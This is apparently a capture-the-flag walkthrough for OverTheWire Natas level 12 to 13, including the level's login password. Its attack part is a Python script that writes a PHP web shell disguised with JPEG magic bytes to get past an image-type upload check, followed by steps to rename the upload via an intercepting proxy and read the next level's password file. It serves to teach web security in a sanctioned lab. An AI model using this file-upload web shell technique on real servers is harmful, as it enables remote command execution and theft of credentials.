Level 12 - Level 13

Username: natas13
Password: lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9
URL:      http://natas13.natas.labs.overthewire.org

Overview

This time also same form, but clearly mentioned as only images are allowed.

Source Code analysis

Let's take a look at the source code.

Almost the same code, except this time the MIME type/Magic bytes [ To Know More ] of the uploaded file is checked using the exif_imagetype function to make sure the uploaded file an image.

We can bypass this check by creating a php rev shell with prepended by the magic byte of an jpeg file.

Getting the Password

We can create such a file using simple python script:

# PHP reverse shell of type image
fh = open('shell.php', 'wb')
fh.write(b'\xFF\xD8\xFF\xE0' + b'<? passthru($_GET["cmd"]); ?>')
fh.close()

Upload the file generated by the above script. Remember to intercept the upload request via burpsuite and modify the hard coded jpg extension to php.

Now let's retrieve the password by viewing the contents of /etc/natas_webpass/natas14.

PreviousLevel 11 - Level 12 NextLevel 13 - Level 14

Last updated 8 months ago